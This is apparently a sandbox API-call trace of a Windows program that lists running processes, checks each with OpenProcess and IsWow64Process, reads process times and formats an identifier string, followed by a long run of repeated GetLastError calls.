	[0096.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x65ada8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0096.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0096.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0096.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0096.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0096.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0096.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0096.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0096.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0096.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0096.672] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.673] CloseHandle (hObject=0x248) returned 1
	[0096.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0096.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0096.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0096.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x6590e8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0096.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0096.673] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.673] CloseHandle (hObject=0x248) returned 1
	[0096.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x6590a8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0096.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0096.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0096.674] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.674] CloseHandle (hObject=0x248) returned 1
	[0096.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x64fe78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0096.674] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.674] CloseHandle (hObject=0x248) returned 1
	[0096.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0096.675] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.675] CloseHandle (hObject=0x248) returned 1
	[0096.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0096.675] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.675] CloseHandle (hObject=0x248) returned 1
	[0096.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x658e68, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0096.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0096.675] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.675] CloseHandle (hObject=0x248) returned 1
	[0096.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x64fe78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0096.676] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.676] CloseHandle (hObject=0x248) returned 1
	[0096.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0096.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0096.676] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.676] CloseHandle (hObject=0x248) returned 1
	[0096.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fe90, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0096.677] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.677] CloseHandle (hObject=0x248) returned 1
	[0096.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0096.677] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.677] CloseHandle (hObject=0x248) returned 1
	[0096.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x658f68, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0096.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0096.677] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.677] CloseHandle (hObject=0x248) returned 1
	[0096.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x6590a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0096.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0096.678] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.678] CloseHandle (hObject=0x248) returned 1
	[0096.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x65acc8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0096.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0096.678] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.678] CloseHandle (hObject=0x248) returned 1
	[0096.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x658ee8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0096.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0096.678] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.678] CloseHandle (hObject=0x248) returned 1
	[0096.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x658970, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0096.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0096.679] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.679] CloseHandle (hObject=0x248) returned 1
	[0096.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x658d88, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0096.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0096.679] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.679] CloseHandle (hObject=0x248) returned 1
	[0096.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0096.679] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.679] CloseHandle (hObject=0x248) returned 1
	[0096.679] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0096.680] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.680] CloseHandle (hObject=0x248) returned 1
	[0096.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x658ee8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0096.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0096.680] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.680] CloseHandle (hObject=0x248) returned 1
	[0096.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x658ea8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0096.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0096.680] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.680] CloseHandle (hObject=0x248) returned 1
	[0096.680] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x64fe78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0096.681] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.681] CloseHandle (hObject=0x248) returned 1
	[0096.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x64fd10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0096.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0096.681] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.681] CloseHandle (hObject=0x248) returned 1
	[0096.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x658c68, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0096.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0096.681] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.681] CloseHandle (hObject=0x248) returned 1
	[0096.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0096.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0096.682] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.682] CloseHandle (hObject=0x248) returned 1
	[0096.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x64fd28, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0096.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0096.682] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.682] CloseHandle (hObject=0x248) returned 1
	[0096.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x658d88, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0096.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0096.682] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.682] CloseHandle (hObject=0x248) returned 1
	[0096.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0096.683] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.683] CloseHandle (hObject=0x248) returned 1
	[0096.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x658d28, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0096.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0096.683] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.683] CloseHandle (hObject=0x248) returned 1
	[0096.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x658c68, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0096.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0096.683] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.683] CloseHandle (hObject=0x248) returned 1
	[0096.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x6589e8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0096.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0096.684] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.684] CloseHandle (hObject=0x248) returned 1
	[0096.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x64fe78, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0096.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0096.684] GetLastError () returned 0x5
	[0096.684] GetLastError () returned 0x5
	[0096.684] GetLastError () returned 0x5
	[0096.684] GetLastError () returned 0x5
	[0096.684] GetLastError () returned 0x5
	[0096.684] GetLastError () returned 0x5
	[0096.684] GetLastError () returned 0x5
	[0096.684] GetLastError () returned 0x5
	[0096.684] GetLastError () returned 0x5
	[0096.684] GetLastError () returned 0x5
	[0096.684] GetLastError () returned 0x5
	[0096.684] GetLastError () returned 0x5
	[0096.684] GetLastError () returned 0x5
	[0096.684] GetLastError () returned 0x5
	[0096.684] GetLastError () returned 0x5
	[0096.684] GetLastError () returned 0x5
	[0096.684] GetLastError () returned 0x5
	[0096.684] GetLastError () returned 0x5
	[0096.684] GetLastError () returned 0x5
	[0096.684] GetLastError () returned 0x5
	[0096.684] GetLastError () returned 0x5
	[0096.685] GetLastError () returned 0x5
	[0096.685] GetLastError () returned 0x5
	[0096.685] GetLastError () returned 0x5
	[0096.685] GetLastError () returned 0x5
	[0096.685] GetLastError () returned 0x5
	[0096.685] GetLastError () returned 0x5
	[0096.685] GetLastError () returned 0x5
	[0096.685] GetLastError () returned 0x5
	[0096.685] GetLastError () returned 0x5
	[0096.685] GetLastError () returned 0x5
	[0096.685] GetLastError () returned 0x5
	[0096.685] GetLastError () returned 0x5
	[0096.685] GetLastError () returned 0x5
	[0096.685] GetLastError () returned 0x5
	[0096.685] GetLastError () returned 0x5
	[0096.685] GetLastError () returned 0x5
	[0096.685] GetLastError () returned 0x5
	[0096.685] GetLastError () returned 0x5
	[0096.685] GetLastError () returned 0x5
	[0096.685] GetLastError () returned 0x5
	[0096.685] GetLastError () returned 0x5
	[0096.685] GetLastError () returned 0x5
	[0096.685] GetLastError () returned 0x5
	[0096.685] GetLastError () returned 0x5
	[0096.685] GetLastError () returned 0x5
	[0096.685] GetLastError () returned 0x5
	[0096.685] GetLastError () returned 0x5
	[0096.685] GetLastError () returned 0x5
	[0096.685] GetLastError () returned 0x5
	[0096.685] GetLastError () returned 0x5
	[0096.685] GetLastError () returned 0x5
	[0096.685] GetLastError () returned 0x5
	[0096.685] GetLastError () returned 0x5
	[0096.685] GetLastError () returned 0x5
	[0096.685] GetLastError () returned 0x5
	[0096.685] GetLastError () returned 0x5
	[0096.685] GetLastError () returned 0x5
	[0096.685] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0096.686] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0096.686] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0096.686] GetLastError () returned 0x5
	[0096.686] GetLastError () returned 0x5
	[0096.686] GetLastError () returned 0x5
	[0096.686] GetLastError () returned 0x5
	[0096.686] GetLastError () returned 0x5
	[0096.686] GetLastError () returned 0x5
	[0096.686] GetLastError () returned 0x5
	[0096.686] GetLastError () returned 0x5
	[0096.686] GetLastError () returned 0x5
	[0096.686] GetLastError () returned 0x5
	[0096.686] GetLastError () returned 0x5
	[0096.686] GetLastError () returned 0x5
	[0096.686] GetLastError () returned 0x5
	[0096.686] GetLastError () returned 0x5
	[0096.686] GetLastError () returned 0x5
	[0096.686] GetLastError () returned 0x5
	[0096.686] GetLastError () returned 0x5
	[0096.686] GetLastError () returned 0x5
	[0096.686] GetLastError () returned 0x5
	[0096.686] GetLastError () returned 0x5
	[0096.686] GetLastError () returned 0x5
	[0096.686] GetLastError () returned 0x5
	[0096.686] GetLastError () returned 0x5
	[0096.686] GetLastError () returned 0x5
	[0096.686] GetLastError () returned 0x5
	[0096.686] GetLastError () returned 0x5
	[0096.686] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0096.686] GetLastError () returned 0x5
	[0096.686] GetLastError () returned 0x5
	[0096.686] GetLastError () returned 0x5
	[0096.686] GetLastError () returned 0x5
	[0096.686] GetLastError () returned 0x5
	[0096.686] GetLastError () returned 0x5
	[0096.686] GetLastError () returned 0x5
	[0096.686] GetLastError () returned 0x5
	[0096.686] GetLastError () returned 0x5
	[0096.686] GetLastError () returned 0x5
	[0096.686] GetLastError () returned 0x5
	[0096.686] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
	[0096.687] GetLastError () returned 0x5
